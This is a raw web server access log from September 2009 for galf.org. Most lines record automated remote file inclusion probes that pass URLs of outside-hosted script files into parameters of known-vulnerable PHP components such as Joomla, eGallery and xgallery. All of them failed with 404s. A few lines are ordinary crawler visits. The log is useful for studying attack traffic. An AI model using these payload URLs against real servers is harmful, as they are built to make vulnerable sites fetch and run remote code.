91.149.157.136 - - [21/Sep/2009:07:10:28 -0700] "GET /logs/access_090223.log/playing.php/common/db.php?commonpath=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:10:28 -0700] "GET /playing.php/common/db.php?commonpath=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:10:28 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:10:29 -0700] "GET /logs/access_090615.log/playing.php/common/db.php?commonpath=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:10:45 -0700] "GET /logs/access_090518.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:12:49 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
24.91.47.56 - - [21/Sep/2009:07:14:15 -0700] "GET /logs/access_090518.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:15:01 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.162.70.166 - - [21/Sep/2009:07:16:37 -0700] "GET /wp-pass.php?_wp_http_referer=http://www.aquaplant-chile.cl/albums/assscmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
69.162.70.166 - - [21/Sep/2009:07:16:37 -0700] "GET /logs/access_090720.log/wp-pass.php?_wp_http_referer=http://www.aquaplant-chile.cl/albums/assscmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:18:56 -0700] "GET /bbshop/admin/index.php?_shop_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:21:00 -0700] "GET /include/mail.inc.php?skin_board_path=http://ded-santa.com//modules/.admin/id0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:21:00 -0700] "GET /logs/access_090824.log%20%20//include/mail.inc.php?skin_board_path=http://ded-santa.com//modules/.admin/id0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:21:00 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://ded-santa.com//modules/.admin/id0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:07:21:43 -0700] "GET /logs/access_090427.log%20%20//include/mail.inc.php?skin_board_path=http://ded-santa.com//modules/.admin/id0.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:26 -0700] "GET /logs/access_090608.log/index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:26 -0700] "GET /logs/access_090608.log/index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:26 -0700] "GET /logs/index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:26 -0700] "GET /logs/index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:27 -0700] "GET /index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:37 -0700] "GET /logs/access_090511.log/index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.188.112.28 - - [21/Sep/2009:07:22:41 -0700] "GET /logs/access_090511.log/index.php?pagina=http://www.inab.org/joomla/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:07:22:52 -0700] "GET /logs/access_090713.log%20//modules/Forums/admin/admin_disallow.php?phpEx=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:07:22:58 -0700] "GET /logs/access_090420.log%20//modules/Forums/admin/admin_disallow.php?phpEx=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:23:02 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:23:02 -0700] "GET /logs/access_090413.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:23:02 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:23:14 -0700] "GET /logs/access_090427.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:23:57 -0700] "GET /logs/access_090518.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:24:22 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:24:24 -0700] "GET /logs/access_090803.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:24:32 -0700] "GET /big.php?pathtotemplate=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:24:43 -0700] "GET /logs/access.log/big.php?pathtotemplate=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:24:43 -0700] "GET /logs/big.php?pathtotemplate=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:25:26 -0700] "GET /logs/access_090420.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:25:26 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:25:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:27:07 -0700] "GET /logs/access_090302.log//bbshop/admin/index.php?_shop_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:27:07 -0700] "GET /bbshop/admin/index.php?_shop_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:27:08 -0700] "GET /logs//bbshop/admin/index.php?_shop_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.203.198.252 - - [21/Sep/2009:07:27:38 -0700] "GET /logs/access_090518.log//bbshop/admin/index.php?_shop_path=http://hr-mag.com/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:07:29:01 -0700] "GET /logs///includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:30:27 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
205.134.252.26 - - [21/Sep/2009:07:30:27 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
205.134.252.26 - - [21/Sep/2009:07:30:27 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
205.134.252.26 - - [21/Sep/2009:07:30:27 -0700] "GET /logs/access_090420.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:07:30:46 -0700] "GET /logs///includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:07:31:24 -0700] "GET /logs///includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:38:35 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:38:35 -0700] "GET /logs/access_090316.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:38:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [21/Sep/2009:07:38:45 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:07:38:45 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:07:38:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:07:41:54 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:07:41:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
117.102.204.130 - - [21/Sep/2009:07:41:54 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.39.130.24 - - [21/Sep/2009:07:42:12 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:42:12 -0700] "GET /logs/access_090406.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:42:12 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:42:27 -0700] "GET /logs/access_090601.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.29 - - [21/Sep/2009:07:42:41 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.0; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:43:41 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:43:41 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:43:41 -0700] "GET /logs/access_090406.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:07:43:52 -0700] "GET /modules/Forums/admin/admin_users.php?phpEx=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:07:43:52 -0700] "GET /logs/access_090518.log%20//modules/Forums/admin/admin_users.php?phpEx=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:07:43:57 -0700] "GET /logs//modules/Forums/admin/admin_users.php?phpEx=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:44:00 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:44:00 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:44:00 -0700] "GET /logs/access_090413.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:44:04 -0700] "GET /logs/access_090601.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:44:21 -0700] "GET /logs/access_090427.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:44:34 -0700] "GET /logs/access_090518.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:45:03 -0700] "GET /logs/access_090601.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:45:55 -0700] "GET /logs/access_090302.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:46:39 -0700] "GET /logs/access_090629.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:46:45 -0700] "GET /logs/access_090420.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:07:46:45 -0700] "GET /logs/access_090803.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.24 - - [21/Sep/2009:07:46:47 -0700] "GET /logs/access_090406.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:47:09 -0700] "GET /logs/access_090601.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:47:18 -0700] "GET /logs/access_090406.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:47:18 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:47:18 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [21/Sep/2009:07:47:30 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:07:47:48 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:07:47:48 -0700] "GET /logs/access_090420.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:07:47:48 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.28 - - [21/Sep/2009:07:47:50 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; CMS Music Store2 v1.00.25 (Music Store,1033))" "www.galf.org"
205.134.252.26 - - [21/Sep/2009:07:47:54 -0700] "GET /logs/access_090601.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:48:06 -0700] "GET /logs/access_090302.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:48:31 -0700] "GET /logs/access_090629.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [21/Sep/2009:07:48:39 -0700] "GET /logs/access_090406.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:07:48:55 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:07:48:55 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:07:48:55 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:07:52:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:52:00 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:52:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:52:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:52:00 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:07:52:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.102.204.130 - - [21/Sep/2009:07:52:48 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.52.205.88 - - [21/Sep/2009:07:54:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
74.6.8.115 - - [21/Sep/2009:07:56:05 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.80.193.34 - - [21/Sep/2009:07:56:36 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S27145200001031|2600#Service Pack 2#2#5#154321|isdn)" "www.galf.org"
208.80.193.32 - - [21/Sep/2009:07:58:28 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={9FF6B424-9FF1-44be-B196-165700BC2987}; snprtz|T05085404530176#4289|isdn; .NET CLR 1.1.4322)" "www.galf.org"
208.80.193.28 - - [21/Sep/2009:08:02:05 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.1.0; SV1)" "www.galf.org"
72.52.205.88 - - [21/Sep/2009:08:03:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
208.80.193.27 - - [21/Sep/2009:08:03:57 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {0E94AAFC-E147-D1FC-9F66-4BC6B9AA7F38})" "www.galf.org"
208.80.193.30 - - [21/Sep/2009:08:05:25 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.galf.org"
117.102.204.130 - - [21/Sep/2009:08:06:16 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
